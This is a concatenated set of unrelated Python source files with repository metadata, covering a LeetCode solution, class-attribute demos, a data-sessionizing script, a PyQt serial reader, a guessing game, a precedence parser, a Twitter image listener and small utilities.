c58f04c352758ec38036a3158f57cde81fbbd04f | 3879d1ca43c573c209f962182cd1e7f7fe978fbf | /leetcode/1973. Count Nodes Equal to Sum of Descendants/1973.py | 0b8f98e6fa4a8d999bcefc23edcbc239a22b78c5 | [] | no_license | DoctorLai/ACM | 34a5600a5adf22660c5d81b2d8b7a358be537ecf | aefa170f74c55c1230eb6f352770512b1e3f469e | refs/heads/master | 2023-09-01T02:13:01.604508 | 2023-08-31T15:42:07 | 2023-08-31T15:42:07 | 146,173,024 | 62 | 18 | null | 2020-10-11T13:19:57 | 2018-08-26T11:00:36 | C++ | UTF-8 | Python | false | false | 864 | py | # https://helloacm.com/teaching-kids-programming-count-nodes-equal-to-sum-of-descendants-recursive-depth-first-search-algorithm/
# https://leetcode.com/problems/count-nodes-equal-to-sum-of-descendants/
# MEDIUM, DFS, RECURSION
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
    def equalToDescendants(self, root: "Optional[TreeNode]") -> int:
        """Count nodes whose value equals the sum of all their descendants.

        Post-order DFS: each call returns the subtree sum (node + all
        descendants), so a node can compare its value against the sums of
        its two children's subtrees.  Annotations are quoted so the class
        also imports cleanly outside the LeetCode harness, where TreeNode
        and Optional are not defined (the original raised NameError).
        """
        self.ans = 0

        def dfs(node):
            if not node:
                return 0
            lsum = dfs(node.left)
            rsum = dfs(node.right)
            if lsum + rsum == node.val:
                self.ans += 1
            return lsum + rsum + node.val

        dfs(root)
        return self.ans
| [
"noreply@github.com"
] | noreply@github.com |
ef5e7324a1148561025d0b287b395e8274acc7da | 4fb5bbde4e1edaadbb1b1debe4cfcb31362001ed | /IsarMainDisp/PythonVersiyonu/Tekrar/Tekrar1.py | bca68c85a6b9cd62e911d1ed40ad87667c9f5bc6 | [] | no_license | develooper1994/RCScalculator1 | ce285a4bf95eaeca5af1d8c90e45ce5d702b3e79 | be7cb0dc436db8378003ddfe41c61cd96c3d6b4f | refs/heads/master | 2020-05-04T18:55:00.531640 | 2019-04-03T21:44:14 | 2019-04-03T21:44:14 | 179,371,600 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,046 | py | from typing import List
print("Selçuk")
def passing_example(a_list, an_int=2, a_string="A default string"):
    """Demonstrate argument passing: the list is mutated in place, while
    rebinding the int/string only affects the local names."""
    a_list.append("A new item")
    return a_list, 4, a_string
# Demo: the list argument is mutated in place; the int is rebound locally only.
mylist: List[int] = [1, 23, 85]
myist: int = 10
print(passing_example(mylist, myist))
# ------------ Class ------------
class MyClass(object):
    """Toy class illustrating class attributes vs instance attributes."""

    common = 10  # shared class attribute

    def __init__(self):
        # Per-instance attribute; shadows any class attribute of the same name.
        self.myVariable = 3

    def myfunction(self, arg1: object, arg2: object) -> object:
        """Ignore both arguments and return the instance attribute."""
        return self.myVariable
classinstance = MyClass()
classinstance2 = MyClass()
print(classinstance.myfunction(1, 2))
# "common" is a class attribute: both instances see the same value...
print(classinstance.common)
print(classinstance2.common)
# ...and reassigning it on the class changes it for every instance.
MyClass.common = 30
print(classinstance.common)
print(classinstance2.common)
# not working — more precisely: this *does* set a class attribute, but each
# instance's own myVariable (set in __init__) shadows it, so the prints
# below still show the instance values.
MyClass.myVariable = 5
print(classinstance.myVariable)
print(classinstance2.myVariable)
# Assigning on one instance affects only that instance.
classinstance.myVariable = 330780
print(classinstance.myVariable)
print(classinstance2.myVariable)
# Sums 0 for each matching element, so this is always 0 (likely meant "1").
SUM = sum(0 for i in [3,5,7,9,4,3,7] if i == 7)
print(SUM)
| [
"noreply@github.com"
] | noreply@github.com |
00c8f30dba2a82f7e67cb93f025e52e09d9e17d1 | 692fbe4ff8076718460e94c22f334a9d36b82b5d | /AnonWork/masterimport.py | 341e96ba26a2b7e6e02f74e2b577e3d06f10176b | [] | no_license | Harandi6135/ZooData | 8971ebffb5a7adcd16dbe9d2298101da7f072ea3 | 44e262f8ac3be54559f395ad99eb012db2a6b217 | refs/heads/master | 2020-12-24T06:08:02.691146 | 2016-11-03T14:14:48 | 2016-11-03T14:14:48 | 73,226,156 | 1 | 0 | null | 2016-11-08T20:54:22 | 2016-11-08T20:54:21 | null | UTF-8 | Python | false | false | 3,957 | py | import pandas as pd
import numpy as np
import re
import datetime
from itertools import tee, islice, chain, izip
# This is a test
############## Import Raw datafile ##############
# NOTE: "%cd" is an IPython magic — this file is a notebook export and is not
# valid plain Python as-is.
%cd "/Users/coreyjackson/Dropbox/ZooSOCS dropbox/Papers/CSCW 2017 (AnonWork)/RawData/Archive"
raw_data = pd.read_csv('HiggsHuntersClassificationsAnonWork112615.csv') # CHANGE NAME OF .CSV FILE
# Keep only the columns of interest
anon_population = pd.DataFrame(raw_data, columns = ['_id', 'created_at', 'favorite', 'subject_ids', 'tutorial','user_id','user_ip','user_name'])
del raw_data
# Need to first parse date/time to new field (date and time are extracted
# positionally from the created_at string, then recombined)
anon_population['year'] = anon_population['created_at'].str.extract('(....-..-..)')
anon_population['time'] = anon_population['created_at'].str.extract('(..:..:..)')
anon_population['datetime'] = anon_population['year'] + " " +anon_population['time']
anon_population['datetime'] = pd.to_datetime(anon_population['datetime'])
# Delete the fields we created and those that are unnecessary
del anon_population['year']
del anon_population['time']
del anon_population['created_at']
#del anon_population['tutorial']
#del anon_population['favorite']
# Sort dataframe by user by date (required by the shift()-based logic below)
anon_population = anon_population.sort_values(['user_ip','datetime'], ascending=[1, 1])
# True where this row's ip matches the previous row's ip
anon_population['same_ip'] = anon_population['user_ip'].shift() == anon_population['user_ip']
# Shifts up one removing first observation, last is NA (for ip)
anon_population.same_ip = anon_population.same_ip.shift(-1)
# Makes new column holding the *next* row's timestamp
anon_population['datetime2'] = anon_population['datetime']
# Shifts up one removing first observation, last is NA (for datetime)
anon_population.datetime2 = anon_population.datetime2.shift(-1)
# Ensure both columns are datetime dtype
anon_population['datetime'] = pd.to_datetime(anon_population['datetime'])
anon_population['datetime2'] = pd.to_datetime(anon_population['datetime2'])
# Time spent = gap between this classification and the next one
anon_population['timespent'] = anon_population['datetime2'] - anon_population['datetime']
# Function for iterating
def previous_and_next(some_iterable):
    """Yield (previous, item, next) triples over *some_iterable*.

    The first triple uses 0 as its "previous" value and the last triple
    uses 0 as its "next" value -- the sentinel the session/classification
    counters below rely on.
    """
    prevs, items, nexts = tee(some_iterable, 3)
    prevs = chain([0], prevs)                   # 0 sentinel before the first element
    nexts = chain(islice(nexts, 1, None), [0])  # 0 sentinel after the last element
    # zip stops at the shortest stream, i.e. exactly len(items) triples.
    # (The original also contained a stray bare `next` expression statement --
    # a leftover from editing -- which has been removed.)
    return zip(prevs, items, nexts)
# Count through the number of annotation by ip address
ip = anon_population['user_ip']
classification_no = []
for previous, item, nxt in previous_and_next(ip):
if item == previous:
classification = classification + 1
classification_no.append(classification)
# print "Item is now", item, "next is", nxt, "previous is", previous
else:
classification = 1
classification_no.append(classification)
anon_population['Classifications'] = classification_no
# Loop to iterate and create session variable by ip address
time = anon_population['timespent']
ip = anon_population['user_ip']
session_no = []
session = 1
for i,j,l,m in zip(ip, ip[1:], time, time[1:]):
#print i,j,l,m
if i == j and l <= datetime.timedelta(minutes=30):
session = session
session_no.append(session)
elif i == j and l > datetime.timedelta(minutes=30):
session = session + 1
session_no.append(session)
else :
session = 1
session_no.append(session)
# Check length of anon file and session list
len(anon_population)
len(session_no)
# Add one element to beginning of list. Required for appending list
session_no.insert(0,1)
del anon_population['datetime2']
# Paste list to anon_population dataframe
anon_population['Session'] = session_no
#anon_population.Session = anon_population.Session.shift(-1)
time = anon_population['timespent']
time_sec = []
for i in time:
timeseconds = i.total_seconds()
time_sec.append(timeseconds)
anon_population['Time_Seconds'] = time_sec
# Export dataframe
anon_population.to_csv('HiggsHunters.csv') #Change File name to project name.
| [
"cjacks04@syr.edu"
] | cjacks04@syr.edu |
a0bb22d75043b02cc63c5177d8cb32a240dfb49c | bef6f2e5b47ccb21b5be4d0a9e5443363448c2fa | /uartToFile/uart_qt.py | 3a1f5deed697c97681384c4b6863f7d532f101c4 | [] | no_license | cyang812/tools | cd7b7ff1c0014f79975116445aa05cc1fb5b4d59 | 5fc5b6533ea2486324884905d81a605c7ca5f5db | refs/heads/master | 2023-02-04T10:05:49.796267 | 2023-01-10T09:25:56 | 2023-01-10T09:25:56 | 133,904,026 | 12 | 12 | null | null | null | null | UTF-8 | Python | false | false | 3,155 | py | # -*- coding: utf-8 -*-
# @Author: cyang812
# @Date: 2018-05-20 20:52:16
# @Last Modified by: ygh
# @Last Modified time: 2018-06-05 09:45:20
import sys
import threading
import serial
import time
import ctypes
import win32
import win32file
import win32con
import pywintypes
from PyQt5.QtWidgets import (QWidget, QPushButton, QFrame, QApplication)
from PyQt5.QtGui import QColor
def open_serial(com, baudrate):
    # Open serial port `com` at `baudrate` with a 60 s read timeout.
    # Returns the open serial.Serial object, or None (implicitly) when
    # opening fails -- the exception is only printed, never re-raised,
    # so callers must check for a None result.
    try:
        serialFd = serial.Serial(com, baudrate, timeout=60)
        return serialFd
    except Exception as e:
        print(e)
def send_serial(com, content):
    """Encode *content* to bytes and write it out on the open port *com*."""
    payload = content.encode()
    com.write(payload)
def receive_serial(com, count):
    """Read and return up to *count* bytes from the open port *com*."""
    data = com.read(count)
    return data
def close_serial(com):
    """Close the serial port *com*."""
    com.close()
class uartToFile(QWidget):
    """Qt widget that toggles a serial port open/closed on a worker thread
    and tallies received bytes (the save-to-file half is still a stub)."""
    def __init__(self):
        super().__init__()
        self.initUI()
        # Unconfigured port object; port name and baudrate are set on open.
        self.com = serial.Serial()
    def initUI(self):
        # Build the static UI: two checkable buttons plus a colored square.
        self.col = QColor(0, 0, 0)
        serialOpenCloseButton = QPushButton('openClose', self)
        serialOpenCloseButton.clicked.connect(self.openCloseSerial)
        serialOpenCloseButton.setCheckable(True)
        serialOpenCloseButton.move(20, 10)
        saveToFileButton = QPushButton('saveOrNot', self)
        saveToFileButton.clicked[bool].connect(self.open_close)
        saveToFileButton.setCheckable(True)
        saveToFileButton.move(20, 60)
        self.square = QFrame(self)
        self.square.setGeometry(150, 20, 100, 100)
        self.square.setStyleSheet("QWidget { background-color: %s }" %
            self.col.name())
        self.setGeometry(300, 300, 600, 400)
        self.setWindowTitle('uart To File')
        self.show()
    def open_close(self, pressed):
        # Slot for the saveOrNot toggle; currently only logs the intent
        # (no file is actually opened or closed yet).
        source = self.sender()
        print(source.text(), pressed)
        if source.text() == 'saveOrNot':
            if pressed == True:
                print('save file')
            else:
                print('close file')
    def openCloseSerial(self):
        # Slot for the openClose button: run the (blocking) open/close work
        # on a daemon thread so the UI stays responsive.
        print('openCloseSerial')
        t = threading.Thread(target=self.openCloseSerialProcess)
        t.setDaemon(True)
        t.start()
        return
    def openCloseSerialProcess(self):
        # Toggle the port: close it if open, otherwise configure + open it
        # and start the reader thread.
        try:
            if self.com.is_open:
                self.com.close()
                # Signal receiveData()'s loop to stop.
                self.receiveProgressStop = True
                print('uart close')
                print('receiveCount =', self.receiveCount)
            else:
                try:
                    # NOTE(review): baudrate and port are hard-coded --
                    # consider making these configurable in the UI.
                    self.com.baudrate = 115200
                    self.com.port = 'COM7'
                    print(self.com)
                    self.com.open()
                    print('uart open')
                    receiveProcess = threading.Thread(target=self.receiveData)
                    receiveProcess.setDaemon(True)
                    receiveProcess.start()
                except Exception as e:
                    self.com.close()
                    print('uart open fail')
                    print(e)
                    self.receiveProgressStop = True
        except Exception as e:
            print(e)
        return
    def receiveData(self):
        # Reader loop (runs on its own daemon thread): read one byte at a
        # time and count it, until receiveProgressStop is set or a read
        # raises (e.g. the port was closed underneath us).
        self.receiveProgressStop = False
        self.receiveCount = 0
        self.timeLastReceive = 0
        while(not self.receiveProgressStop):
            try:
                if self.com.is_open:
                    print("is_open")
                    content = self.com.read(1)
                    print("try read")
                    if len(content):
                        self.receiveCount += len(content)
                        print("content = ", content)
            except Exception as e:
                print(e)
                print("receiveData error")
                if self.com.is_open:
                    print("self.com.close")
                    self.com.close()
                return
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = uartToFile()
sys.exit(app.exec_())
| [
"cy950812@gmail.com"
] | cy950812@gmail.com |
deb423ef918c9bc40f37e909aebdb85cb4286e76 | 62546d6e9083c4d531cee69c52135ef291b54443 | /Guess_Game.py | 916fb8ca689a1820a08a80ef003ebdf31dfec153 | [] | no_license | Yaelbm-Git/World_Of_Games | 0b466ced65e2b0800ba68bcf5d9e02436b11a0fa | f5b4410fe45617bb8ad12295ed1a777daeaabe7f | refs/heads/master | 2023-02-06T19:10:05.225142 | 2020-12-28T23:37:34 | 2020-12-28T23:37:34 | 321,633,390 | 0 | 1 | null | 2020-12-17T09:00:37 | 2020-12-15T10:31:16 | Python | UTF-8 | Python | false | false | 1,038 | py | import random
from myAbstract import MyAbstract
class Guess_Game(MyAbstract):
    """One round of a number-guessing game against the computer.

    ``diff`` is the difficulty: the secret number is drawn uniformly from
    1..diff, and the player's guess must fall in the same range.
    """

    def __init__(self, diff):
        self.diff = diff

    def welcome(self):
        """Print the game banner."""
        print("\nWelcome to the Guess Game! \n")

    def get_input_from_pc(self):
        """Return the computer's secret number in 1..diff (inclusive)."""
        secret_number = random.randint(1, self.diff)
        return secret_number

    def get_input_from_user(self):
        """Prompt until the player enters a valid integer in 1..diff.

        Bug fixes: the retry value is now returned (previously the
        recursive result was discarded and exit() killed the process),
        and validation uses self.diff instead of a hard-coded 1..10.
        """
        print("Please guess a number between 1 to", self.diff, end = '')
        user_guess = input(": ")
        if not user_guess.isdigit():
            print("your guess must be a digit")
            return self.get_input_from_user()
        int_user_guess = int(user_guess)
        if not int_user_guess in range(1, self.diff + 1):
            print("Your choice is invalid. Your guess must be between 1 to", self.diff)
            return self.get_input_from_user()
        return (int_user_guess)

    def compare(self):
        """Return True when the player's guess matches the secret number."""
        return self.get_input_from_user() == self.get_input_from_pc()

    def play(self):
        """Run one round: show the banner, then return the comparison result."""
        self.welcome()
        return (self.compare())
| [
"yael.ben-michael@gmail.com"
] | yael.ben-michael@gmail.com |
0b205c12342378f7ce7b47dbe339627f706f8e2f | dd73faa1c747089c44dbe85e081de5a089046329 | /api_app/views/index_view.py | afa13a27813919ffbd4ba28140a04fb8d96188ab | [] | no_license | spaun299/api_tv_web | 34aaa6da5fc0f3154a5830953ec8e9ee90d1a3b0 | a19c0079e06a7c823236fda5ffe9d1e46a5e829d | refs/heads/master | 2021-01-10T03:39:25.309627 | 2016-02-12T10:26:34 | 2016-02-12T10:26:34 | 51,149,276 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | from ..urls.blueprints import index_bp
from flask import render_template, g
from ..constants.constants import ACTIVE_PAGES
@index_bp.route('/')
@index_bp.route('/index')
def index():
    """Render the landing page with the 'main' navigation entry marked active."""
    active = ACTIVE_PAGES['main']
    return render_template('index.html', active_page=active)
| [
"you@example.com"
] | you@example.com |
8f5bfbe91a76e854fc4c00a22b6e106d54e1f08f | 1dd9ab4f92ad4fbaa4cba329924013b84c932857 | /operator_precedence.py | bb0dc677a0fde7273c84298872c5b427b7957f1a | [] | no_license | royalbhati/PythonScripts | ddae90abff6a123f7b7f6c4e801cbc8f15e4b7ff | f2e8ad977b7ad88b589960c360c4df469952856f | refs/heads/master | 2021-09-14T00:20:05.428995 | 2018-05-06T13:37:19 | 2018-05-06T13:37:19 | 121,004,821 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,561 | py | import sys
import shlex
import csv
import pprint
class Stack:
    """Minimal LIFO stack backed by a Python list.

    The backing list is exposed as the ``items`` attribute (the driver
    script prints ``matching_str.items`` directly).  The original class
    also defined an ``items()`` method of the same name, but the instance
    attribute assigned in __init__ always shadowed it, making the method
    unreachable dead code; it has been removed.
    """

    def __init__(self):
        self.items = []

    def isEmpty(self):
        """Return True when the stack holds no elements."""
        return self.items == []

    def push(self, item):
        """Put *item* on top of the stack."""
        self.items.append(item)

    def pop(self):
        """Remove and return the top element (IndexError when empty)."""
        return self.items.pop()

    def peek(self):
        """Return the top element without removing it (IndexError when empty)."""
        return self.items[len(self.items)-1]

    def size(self):
        """Return the number of stacked elements."""
        return len(self.items)
def get_prec(element, i):
    """Return the precedence relation ('<', '>' or '') between stack-top
    symbol *element* and lookahead *i*, read from the global order_table.

    Returns None when either symbol is not one of the table's operators
    (the original duplicated six near-identical if-branches and raised a
    TypeError for an unknown lookahead; this version degrades to None).
    """
    header = order_table[0]
    # Row labels (column 0) appear in the same order as the header row,
    # so a symbol's header index doubles as its row index.
    if element in header[1:] and i in header[1:]:
        return order_table[header.index(element)][header.index(i)]
def get_val_i(i):
    """Return the column index of symbol *i* in the order_table header,
    or None when *i* is not one of the table's operators.

    Collapses the original six duplicated if-branches into one lookup;
    header[0] is the empty corner cell and is excluded, matching the
    original's behavior of never matching ''.
    """
    header = order_table[0]
    if i in header[1:]:
        return header.index(i)
input_string = "i+i*i"
input_ind = list(shlex.shlex(input_string))
input_ind.append('$')
order_table=[['', '+', '-', '*', '/', 'i', '$'],
['+', '>', '>', '<', '<', '<', '>'],
['-', '>', '>', '<', '<', '<', '>'],
['*', '>', '>', '>', '>', '<', '>'],
['/', '>', '>', '>', '>', '<', '>'],
['i', '>', '>', '>', '>', '', '>'],
['$', '<', '<', '<', '<', '<', '']]
pprint.pprint(order_table)
a='''E->E+E
|E-E
|E*E
|E/E
|i'''
matching_str=Stack()
matching_str.push('$')
def evalu(prec_op, i):
    # Apply one operator-precedence parser action for lookahead symbol `i`,
    # mutating the global `matching_str` stack:
    #   '<' : shift  -- push the lookahead onto the stack
    #   '>' : reduce -- pop, then recursively re-evaluate the new stack top
    #                   against the same lookahead
    #   ''  : no relation defined in the table; do nothing
    # NOTE(review): a None prec_op (symbol missing from order_table) also
    # falls through silently -- presumably intentional, worth confirming.
    if prec_op=='<':
        matching_str.push(i)
        print('shift')
    elif prec_op=='>':
        matching_str.pop()
        print('reduce')
        a=get_prec(matching_str.peek(),i)
        evalu(a,i)
    elif prec_op=='':
        pass
for i in input_ind:
element=matching_str.peek()
prec_op=get_prec(element,i)
print(matching_str.items)
evalu(prec_op,i)
if matching_str.size()==1 and matching_str.peek()=='$':
print('String accepted')
else:
print('String not accepted')
| [
"noreply@github.com"
] | noreply@github.com |
b5c4f9532ae6f0269e6d76b4acf677bf009ad9f1 | d8874483816989dd796ab3f9f09af068ae9cea5d | /elevent_model.py | 4c81037b013dcf9c93ec123edd62f9cbf7bbd23d | [] | no_license | cnn911/tmp | 9cf015665d1a134a190514abb5a3daa2d8177c63 | 873c8ccd7f1e29e6be5209c63039172c94a4dc69 | refs/heads/master | 2023-07-19T14:24:44.017693 | 2021-09-22T11:06:45 | 2021-09-22T11:06:45 | 110,768,079 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,398 | py | # -*- encoding: utf-8 -*-
"""
Created on Tue Jan 23 21:51:57 2018
@author: Administrator
"""
'''
策略模式:它是一种行为型模式。用接口类来实现算法的大体框架,然后根据不同的需求来实现具体的细节。。
他主要是针对行为,活动,算法这类动态内容,所以被称之为行为型模式?
他不同与工厂模式的地方可能在于他针对的是类行为型的对象。
有的时候子类里的行为、状态是不断更新,增加的,所以如果从父类继承的话需要不断的增加所以并不合适,这时候就需要
把变化的部分抽象出来,然后独自形成一个框架。
完成一个事物我需要的是什么?
'''
from abc import ABC
from abc import abstractmethod
from collections import namedtuple
customer =namedtuple('test', 'name price')
class Line:
    """A single cart line whose total is simply its price."""

    def __init__(self, price):
        self.price = price

    def total(self):
        """Return this line's price as its total."""
        return self.price
class ZongJia:
    """Grand total ("zong jia") of a cart of items exposing total()."""

    def __init__(self, cart):
        self.cart = cart

    def total(self):
        """Sum every item's total(), cache it on self._total, return it."""
        amount = 0
        for entry in self.cart:
            amount += entry.total()
        self._total = amount
        return self._total
class Prom(ABC):
    # Strategy interface for a promotion/discount policy.
    # NOTE(review): the abstract method name "dicount" looks like a typo of
    # "discount"; FirstCount overrides "discount" instead and therefore never
    # satisfies this abstract method.  Renaming it here alone would break
    # SecondCount (which implements "dicount"), so it is only flagged.
    @abstractmethod
    def dicount(self, zongjia):
        pass
class FirstCount(Prom):
    """Percentage promotion: 30% off the grand total."""

    def discount(self, zongjia):
        """Return *zongjia* after a 30% discount."""
        return 0.7*zongjia

    # The Prom ABC declares the (mis-spelled) abstract method "dicount";
    # without overriding it this class could not be instantiated at all
    # (abc raises TypeError).  Delegate to the real implementation.
    def dicount(self, zongjia):
        return self.discount(zongjia)
class SecondCount(Prom):
    """Flat promotion: 20 off the grand total."""

    def dicount(self, zongjia):
        """Return *zongjia* minus a flat 20 (satisfies Prom's abstract name)."""
        return zongjia-20

    # Correctly-spelled alias so both strategies expose the same
    # "discount" method as FirstCount.
    def discount(self, zongjia):
        return self.dicount(zongjia)
| [
"605543116@qq.com"
] | 605543116@qq.com |
178406f49b84e6e5e2631898d1ca498baa7ecabf | 00feeddadc58382e8f71ca5e1da0815ddf913f20 | /twitter.py | 144e565f391d23dd424f537bbe4707bad3528354 | [] | no_license | aimoa/moadb | a229731cd02855352ffb141d22dc76298fcb4892 | 9d66bb3fd76d266681d42f23ad0d033f2acb15e3 | refs/heads/master | 2021-01-18T21:07:24.965515 | 2016-05-19T06:21:52 | 2016-05-19T06:21:52 | 55,277,120 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,525 | py | import requests
import json
from tweepy import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
from config import *
from ghash import ghash
class ImageListener(StreamListener):
    """Tweepy stream listener that forwards photo URLs to the image server."""
    # Class-level default; subclasses override with a concrete subject id.
    # (Was "self.subject = 0" at class scope, which raises NameError at
    # module load -- `self` does not exist in a class body.)
    subject = 0

    def on_data(self, data):
        """Handle one raw stream message; POST every non-video photo to `server`."""
        data = json.loads(data)
        if "extended_entities" in data and "media" in data["extended_entities"]:
            for medium in data["extended_entities"]["media"]:
                if medium["type"]=="video":
                    continue
                url = medium["media_url_https"]
                tweet = medium["url"]
                code = ghash(url)
                # Build the outgoing JSON under its own name instead of
                # clobbering the parsed `data` dict mid-loop; also restores
                # the comma after 'ghash' that made this a SyntaxError.
                payload = json.dumps({'image': {
                    'url': url,
                    'tweet': tweet,
                    'ghash': code,
                    'subject': self.subject
                }})
                headers = {'content-type': 'application/json'}
                r = requests.post(server, data=payload, headers=headers)
        return True

    def on_error(self, status):
        # Tweepy error callback: log the HTTP status.
        # (Parenthesized so it is valid on both Python 2 and 3.)
        print(status)
class MoaListener(ImageListener):
    # Class attribute, not "self.subject = ..." (`self` is undefined in a
    # class body); selects Moa's subject id from the config mapping.
    subject = subjects['Moa']
class SuListener(ImageListener):
    # Class attribute, not "self.subject = ..." (`self` is undefined in a
    # class body); selects Su's subject id from the config mapping.
    subject = subjects['Su']
class YuiListener(ImageListener):
    # Class attribute, not "self.subject = ..." (`self` is undefined in a
    # class body); selects Yui's subject id from the config mapping.
    subject = subjects['Yui']
if __name__ == '__main__':
listener = MoaListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, listener)
stream.filter(track=keywords)
| [
"amakalf@gmail.com"
] | amakalf@gmail.com |
ab481e70c1de1b4accd23c0718be1f5394c6a1f3 | b87a6c007e4f64c892f9ecbccba7c90b2d12a1f9 | /src/settings/main.py | e9ab37cb8085db1dac10b37f6e71167ee03a27ff | [] | no_license | labmiriade/bot-cli | 430d5598b69138655a44bd732db920f42d53e9fb | 9c665a1397f030684e20279174a5d5e4c1c7fda4 | refs/heads/main | 2023-06-26T08:07:30.893753 | 2021-06-19T14:31:12 | 2021-06-19T14:31:12 | 344,878,365 | 1 | 0 | null | 2023-03-20T16:49:25 | 2021-03-05T17:03:42 | Python | UTF-8 | Python | false | false | 369 | py | import click
from .autocompletion import auto_completamento
from .empty_cache import svuota_cache
from .whoami import whoami
@click.group(help="Impostazioni della cli")
def settings():
    """
    Click group collecting the CLI settings subcommands
    (autocompletion, cache clearing, whoami).

    The previous docstring mentioned "rapportini" -- a copy-paste from
    another group; the user-facing Italian help text above is left as-is.
    """
    pass
settings.add_command(auto_completamento)
settings.add_command(svuota_cache)
settings.add_command(whoami)
| [
"tom139@users.noreply.github.com"
] | tom139@users.noreply.github.com |
2e6887fd13a2e9a511bc09f740624b798cb447da | 44c49a36d548ded98adfc5b5bf358d85d43c1592 | /Insurance-Server/myInsurance/mySurance/views.py | 50ab16582e4edaf11da04381288f61ba4cf71317 | [] | no_license | crowdhackathon-insurance/The-Bitles | 48e08a41d855332146ca602559f5331764eb6f06 | 6b166a29ee20540fd5b7f822548c380b00f997c2 | refs/heads/master | 2021-01-24T10:18:23.307024 | 2016-10-02T14:48:02 | 2016-10-02T14:48:02 | 69,738,811 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | from django.shortcuts import render
from django.http import HttpResponse
def index(request):
return HttpResponse("Welcome to mySurance!")
# Create your views here.
| [
"orfetheo@gmail.com"
] | orfetheo@gmail.com |
cfb31542806e913e6bbdca1f11f714d5f1879477 | 461142279535ac9194138abd69c0c4cac05d5094 | /DocumentHandler/src/retrieval/extractors_per_dataset/federalist_papers_extractor.py | 6cd62967e95fdab7d0901237de3e69469638bf24 | [
"MIT"
] | permissive | ygorcanalli/documenthandler | 8e926607b94bacef33e7970e5e34378c64293761 | 7fb29747aa6c1000875ff7c332974d3d8618f6d4 | refs/heads/master | 2020-12-24T15:05:02.033594 | 2014-12-31T12:54:56 | 2014-12-31T12:54:56 | 18,921,800 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,157 | py | '''
Created on 21/03/2014
@author: fellipe
'''
import os
import csv
import xml.dom.minidom
import html.parser
from pprint import pprint
from ufrrj.extractors_per_dataset import write_on_file
if __name__ == '__main__':
path = "/media/fellipe/dados/Colecoes de Dados/Authorship/Federalist Papers/papers"
f = open(os.path.join(path,"Paper_x_Author_List.csv"), 'r') # opens the csv file
h = html.parser.HTMLParser()
htm_papers = []
with open(os.path.join(path,"papers.htm"), 'r', encoding ='latin1') as content_file:
lines = content_file.readlines()
current_content = ""
for li in lines:
if li.find('<?xml') != -1 or li.find('<html') != -1 or li.find('</html') != -1 or li =='\n' != -1 or li.find('<p> <br /><br /><br /><br /></p>')!= -1:
continue
if li.find('<h2>') != -1 and current_content != "":
htm_papers.append(current_content)
current_content = ""
current_content += h.unescape(li)
htm_papers.append(current_content)
papers = []
for i in range(0,len(htm_papers)):
current_content = htm_papers[i].replace('<p>', '').replace('</p>', '').replace('<h3>', '').replace('</h3>', '').replace('<h2>', '').replace('</h2>', '')
papers.append({'id':(i+1),'content':current_content,'author':''})
print('len:%d'%len(htm_papers))
try:
reader = csv.reader(f) # creates the reader object
for row in reader: # iterates the rows of the file in orders
if row[0] == 'number':
continue
# print(row)
paper_id = int(row[0]) - 1
papers[paper_id]['author'] = row[1]
papers[paper_id]['disputed'] = row[2].replace(';','')
if len(row) > 3:
papers[paper_id]['obs'] = row[3]
finally:
f.close() # closing
for paperi in papers:
write_on_file(path = os.path.join(path.replace('papers','papers_per_author'),paperi['author'],str(paperi['id'])),content = paperi['content'], encoding='utf8')
pprint(papers) | [
"ygor.canalli@gmail.com"
] | ygor.canalli@gmail.com |
e36a279c7da1ddf582be9cd6892c444d8c89ff99 | f7cf5647517d5d728a306967bf7531cc86525d5a | /sdc_scale.py | 2bba7f66631bbd7661779f25b465819206148b11 | [] | no_license | khokhlov/seismic_data_converter | c6b4663efcf091eb2f76f260374a94cde961accf | b904f8cfa6e846beaa1c82643638886ca2dd6baa | refs/heads/master | 2021-06-08T05:22:34.945126 | 2020-06-19T14:05:27 | 2020-06-19T14:05:27 | 95,864,892 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 634 | py | #!/usr/bin/env python
# (C) Nikolay Khokhlov <k_h@inbox.ru> 2017
import argparse
import numpy as np
import sys
from binjson import load_bin, save_bin
def main():
    """CLI entry point: load a bin file, scale every value, write it back out."""
    arg_parser = argparse.ArgumentParser(description = 'Scale all values at bin file.')
    arg_parser.add_argument('input', help='input file')
    arg_parser.add_argument('output', help='output file')
    arg_parser.add_argument('-s', '--scale', help='scale value', type=float, required = True)
    opts = arg_parser.parse_args()
    header, values = load_bin(opts.input)
    values *= opts.scale
    save_bin(opts.output, values, header['bbox'])
if __name__ == "__main__":
main()
| [
"kolya.khokhlov@gmail.com"
] | kolya.khokhlov@gmail.com |
1d9cfd061ea4127fdb15f3e00a26392d4a007edf | 94bca958f08a662ecdd5005b89644e93408d4ca2 | /stock.py | 4daa61550e7051c5a6d4d2c57e669e765efd06d7 | [] | no_license | SunnyNagam/StockMarketSimulator | 0f014a55f9cddf4c941291c01630d4600246951a | 19a9deac322bb0927e66884bdc5c0fe05230d1f2 | refs/heads/master | 2020-09-30T11:07:29.226903 | 2020-01-04T07:18:53 | 2020-01-04T07:18:53 | 227,275,660 | 0 | 0 | null | 2019-12-11T07:58:40 | 2019-12-11T04:21:38 | Python | UTF-8 | Python | false | false | 2,439 | py | import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import matplotlib.dates as mdates
import datetime as dt
from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
class Stock:
    # Wraps one ticker's daily price history loaded from the bundled
    # 5-year CSV dataset, plus a matplotlib plotting helper.

    # %-template resolved with the ticker symbol to locate the CSV file.
    fileTemplate = "data/individual_Stocks_5yr/%s_data.csv"

    def __init__(self, ticker):
        self.ticker = ticker
        self.data = self.loadData()  # pandas DataFrame; has a "date" column

    def loadData(self):
        # Read this ticker's CSV into a DataFrame.
        return pd.read_csv(self.fileTemplate % self.ticker)

    def printTicker(self):
